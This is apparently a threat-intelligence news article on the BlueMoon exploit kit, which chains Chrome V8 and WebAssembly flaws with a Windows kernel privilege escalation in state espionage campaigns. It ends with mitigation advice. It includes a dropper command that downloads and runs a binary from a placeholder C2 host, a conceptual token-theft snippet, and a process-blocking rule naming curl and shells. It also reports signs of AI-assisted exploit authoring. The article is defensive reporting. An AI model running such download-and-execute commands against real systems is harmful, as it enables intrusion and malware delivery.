stable Bluemoon Exploit Kit · Research

BlueMoon Exploit Kit Chains Chrome Patch-Gap Flaws and Windows Kernel Zero-Day Across State Espionage Campaigns

Threat intelligence dossier diagram summarizing the BlueMoon turnkey exploit kit, illustrating the three-stage vulnerability chain from Chrome V8 memory corruption to Windows kernel elevation, alongside threat actor adoption telemetry and key operational dates.
AK

Threat intelligence editor · Published Sep 14, 2026 · Updated Oct 7, 2026, 8:03 PM EDT

State espionage groups deploy BlueMoon exploit kit, chaining Chrome patch-gap bugs and Windows kernel zero-days for zero-interaction remote code execution.

Between August 28 and September 3, 2026, four state-aligned cyber espionage clusters simultaneously deployed BlueMoon, a turnkey exploit kit executing zero-interaction remote code execution against government, aerospace, and critical manufacturing sectors. State-aligned clusters converging on the same targets is not new, as shown by rival China- and India-linked actors converging on Balochistan police networks. Disclosed on September 9, 2026, through joint findings by Proofpoint Threat Insight, Google Threat Intelligence Group (GTIG), and the Microsoft Security Response Center (MSRC), the intrusion framework bypasses modern endpoint defenses by chaining Chromium V8 type confusion (CVE-2026-85046) and WebAssembly sandbox escape (CVE-2026-87491) flaws with a Microsoft Windows kernel privilege escalation vulnerability (CVE-2026-85880) that was exploited as a zero-day before Microsoft fixed it on September 8, 2026.

Correction (2026-10-05): This article originally did not say that all three CVEs were already in CISA's Known Exploited Vulnerabilities (KEV) catalog before publication. Per the CISA KEV catalog, CVE-2026-85046 was added on 2026-09-04 (federal remediation due 2026-09-18), CVE-2026-85880 on 2026-09-08 (due 2026-09-22) and CVE-2026-87491 on 2026-09-09 (due 2026-09-23). CISA lists known ransomware use as "Unknown" for all three. U.S. federal civilian agencies were therefore already under remediation deadlines when this article was published on 2026-09-14.

Further corrections (2026-10-05): Microsoft fixed CVE-2026-85880 on 2026-09-08 (September 2026 Patch Tuesday, per MSRC), so it was a zero-day exploited before a fix, not an unpatched flaw at publication; the timeline's "MS fix queued" is updated. The Chrome fix versions were wrong: CVE-2026-85046 was fixed in 152.0.7977.82 (September 3) and CVE-2026-87491 in 153.0.8010.36 (September 8), per Chrome Releases. The OS patching row now lists MSRC's fixed builds instead of the exploit's target builds.

Rather than expending proprietary zero-days, BlueMoon’s developers capitalized on an upstream open-source "patch-gap" in Google’s Chromium engine. By monitoring public commits made in early August 2026, the kit’s authors synthesized an exploit and packaged it alongside a Windows privilege escalation vector. The turnkey package was distributed to geographically and doctrinally separated threat groups within three weeks, demonstrating how automated vulnerability weaponization compresses enterprise remediation windows.


Anatomy of an Espionage Run: The Seven-Day Campaign

Telemetry from Proofpoint, GTIG, and MSRC indicates that between August 28 and September 3, 2026, four distinct threat clusters operationalized identical exploitation staging logic, landing pages, and shellcode harnesses.

2026-08-07 2026-08-28 2026-09-01 2026-09-03 2026-09-09
 | | | | |
 v v v v v
Chromium Public TA412 launches "GemStone" UNK_DoubleCheck hits Google releases Proofpoint, GTIG,
V8 Commit Fix targeting US NGOs/commodities; Vietnamese manufacturing Chrome out-of-band and MSRC publish
(Patch-Gap Opens) UNK_LateNight hits US aero (Rust loaders); patch (Stable); coordinated
 contractors (ShadowPad) UNK_QuietRacket (ID/SG) MS fix Sep 8 (Patch Tue) BlueMoon advisory

The primary observed operator was China-nexus cluster TA412 (also tracked as Violet Typhoon and APT31). TA412 targeted United States think tanks, nongovernmental organizations, and global commodity trade desks via spearphishing links leading to exploit landing pages. Upon successful exploitation, the group deployed GemStone, a rogue Chrome extension spoofing Google Gemini artificial intelligence capabilities to harvest active session tokens and browser telemetry.

Concurrently, three additional clusters deployed the kit across separate operational theaters:

Threat Actor ClusterGeopolitical AlignmentTarget Sectors & RegionsDeployed PayloadPrimary Delivery
TA412 (Violet Typhoon)China-nexus state espionageUS Think Tanks, NGOs, Commodity TradersGemStone (Rogue Chrome extension)Spearphishing lures
UNK_LateNightEast Asia (Suspected Broker Client)US Defense Industrial Base, AerospaceShadowPad (Modular C2 trojan)Strategic watering holes
UNK_DoubleCheckRegional Industrial EspionageVietnamese Automotive & ManufacturingRust Loader (Encrypted memory DLLs)Procurement-themed phishing
UNK_QuietRacketSoutheast Asian FocusIndonesian and Singaporean Maritime AgenciesBespoke reverse HTTP/S stagersStrategic web compromise

Technical Dissection: The Three-Vulnerability Chain

While initial industry speculation misattributed the intrusions to a two-stage remote procedure call (RPC) vulnerability, technical analysis confirmed an integrated three-stage pipeline spanning renderer compromise, browser sandbox escape, and kernel privilege escalation.

Victim Visits Exploit URL

CVE-2026-85046: V8 Type Confusion
Array.prototype.sort / fill

Renderer Code Execution
Restricted to V8 Sandbox

CVE-2026-87491: WASM Metadata Desync
V8 Sandbox Memory Escape

Arbitrary Browser Broker RW
Host Process Compromised

CVE-2026-85880: Windows Kernel LPE
ALPC / WNF Pool Corruption

SYSTEM Execution Achieved
SeDebugPrivilege Acquired

cmd.exe /c curl.exe drops msgbox.exe
Final Stage Binary Deployed

Stage 1: Renderer Initial Access via CVE-2026-85046

The initial vector compromises the Chromium V8 engine (v8/src/builtins). A type confusion flaw occurs during just-in-time (JIT) optimization in Maglev and TurboFan when processing Array.prototype.sort followed by sparse array fill() operations. The compiler makes inaccurate assumptions regarding array transitions, enabling out-of-bounds pointer reads and memory corruption within the isolated V8 heap, granting arbitrary shellcode execution confined to the sandboxed renderer process.

Stage 2: V8 Sandbox Escape via CVE-2026-87491

To bypass Chromium’s internal V8 Sandbox, BlueMoon exploits CVE-2026-87491, a memory corruption flaw in WebAssembly (WASM) table metadata management. By writing past internal table structures, the exploit desynchronizes runtime table pointers, altering function pointers within the outer browser broker process and escaping the V8 sandbox boundary.

Stage 3: Kernel Elevation of Privilege via CVE-2026-85880

Operating inside the elevated browser broker, the exploit targets the Windows kernel (ntoskrnl.exe) via CVE-2026-85880. The flaw stems from an Advanced Local Procedure Call (ALPC) port message mismatch interacting with the Windows Notification Facility (WNF).

# Conceptual mechanism: ALPC/WNF pool structure corruption
# Misaligned state data block triggers paged pool buffer overwrite
$TargetToken = Get-SystemSecurityContext -PID 4 # SYSTEM Token
Copy-ProcessSecurityContext -Source $TargetToken -Target CurrentProcess
# Assigns SeDebugPrivilege and elevates caller to NT AUTHORITY\SYSTEM

Supplying an invalid message length causes an out-of-bounds pool overflow into adjacent paged pool memory. BlueMoon overwrites the calling browser process token with the System Token (PID 4), granting SeDebugPrivilege and executing code as NT AUTHORITY\SYSTEM.


AI Artifact Footprints vs. False-Flag Deception

Forensic analysis of BlueMoon staging infrastructure revealed structural anomalies that suggest automated or LLM-assisted authoring. Decompiled staging loaders contained explicit relative paths to internal development documentation:

docs/v8-ctf-chrome-stage4-handover.md

This structure closely matches context-handover files generated by commercial AI coding assistants. Furthermore, decompiled JavaScript wrappers included conversational, explanatory comments (such as reminders to ensure memory table alignment conforms to sandbox boundaries) alongside mock assertions modeled directly on Google’s public v8CTF vulnerability research harness.

However, threat intelligence researchers caution against definitive attribution. While these artifacts provide high-confidence circumstantial evidence of an AI-assisted development pipeline, they could also represent deliberate false flags planted by an advanced actor to mimic open-source bounty research and complicate attribution.

The operational catalyst remains the Chromium patch-gap. On August 7, 2026, an open-source commit resolved the V8 sorting flaw in Chromium's Git repository. Production users on the stable release track did not receive the backported fix until Chrome 152.0.7977.82 shipped on September 3, 2026 (Chrome 153.0.8010.36 followed on September 8 with the fix for CVE-2026-87491). The exploit author diffed the public commit, weaponized the regression within three weeks, and distributed the kit before enterprise defenses could update.


Post-Exploitation Telemetry: The "Curl Dropper" Paradox

A notable characteristic of BlueMoon is the disparity between its sophisticated memory-corruption chain and its noisy post-exploitation execution:

[chrome.exe (NT AUTHORITY\SYSTEM)]
 |
 +---> cmd.exe /c
 |
 +---> curl.exe -s -o %TEMP%\msgbox.exe http://[C2-IP]/stage2.bin
 |
 +---> %TEMP%\msgbox.exe

Because BlueMoon was distributed as a turnkey commercial package, the exploit author included a generic verification harness designed to drop a test binary (msgbox.exe). Operating on compressed operational timelines, threat groups deployed the default routine directly into live operations without developing stealthy in-memory reflection or process hollowing. Consequently, endpoint detection systems immediately flagged elevated browser processes spawning command shells, curl.exe establishing external HTTP connections, and binaries executing out of %TEMP%.


Enterprise Mitigation and Defense Matrix

Defending enterprise environments against patch-gap exploit kits requires coordinated browser policy enforcement, process execution gating, and operating system patching:

Defense LayerRecommended ControlTechnical ConfigurationOperational Trade-off
Browser PolicyDisable V8 JIT OptimizerGPO: DefaultJavaScriptJitSetting = 2Neutralizes V8 type confusion; minor latency on complex single-page apps.
Process GatingBlock Script SpawningEDR / ASR Rule: Block chrome.exe spawning cmd.exe, powershell.exe, or curl.exeCompletely disrupts BlueMoon’s default dropper with negligible enterprise false positives.
Execution ControlRestrict Temp Directory ExecutionWDAC / AppLocker rules blocking binary execution from %TEMP% and %LOCALAPPDATA%\TempHalts execution of dropped stage binaries and test loaders on endpoint disks.
OS PatchingRemediate CVE-2026-85880Apply the September 2026 Windows security updates from MSRC: Windows 10 1607/Server 2016 build 10.0.14393.9512 (KB5123099), 1809/Server 2019 10.0.17763.9245 (KB5122876), 21H2/22H2 10.0.19044/19045.7725 (KB5122878), Server 2022 10.0.20348.5622 (KB5122882), Server 2012 (KB5123065), Server 2012 R2 (KB5123066). Proofpoint reports the BlueMoon exploit targets builds 17763, 19041–19045, 20348 and 22000.Resolves ALPC/WNF pool corruption and prevents kernel token manipulation. MSRC lists no Windows 11 fix entry for this CVE.
Browser LifecycleExpedite Browser UpdatesDeploy Google Chrome version 153.0.8010.36 or later (the earliest build fixing both flaws); enforce browser restart promptsEliminates both CVE-2026-85046 and CVE-2026-87491 across the enterprise fleet.

Security teams should immediately audit fleets for unpatched Windows builds and verify browser deployment rings. Implementing strict process-creation boundaries on browser executables ensures reliable protection against future turnkey exploit kits weaponizing upstream open-source patch gaps.

Related reading

Keep reading

All latest →
  1. watchResearchOpenAI Collapses API Usage Tiers From Five to Three: Grow Unlocks $200,000 a Month at $5005 min
  2. elevatedResearchGitHub Copilot Business and Enterprise Now Bill Seats Upfront: What Changed on Oct 15 min
  3. watchResearchThe $10 Open-Model Coding Plan in October 2026: Three Real Options, Six Near Misses, and the Math11 min
  4. watchResearchGemini 3.8 TTS Pricing Doubles on Jan 1, 2027: What Voice-App Builders Should Budget3 min
  5. watchResearchCloudflare Open-Sources Clef Decision Models as Ollama Adds a Decision-Model API5 min
  6. watchResearchvLLM v0.30.0 Upgrade Notes: Fast Start, HiSparse, New Models and the Breaking Changes4 min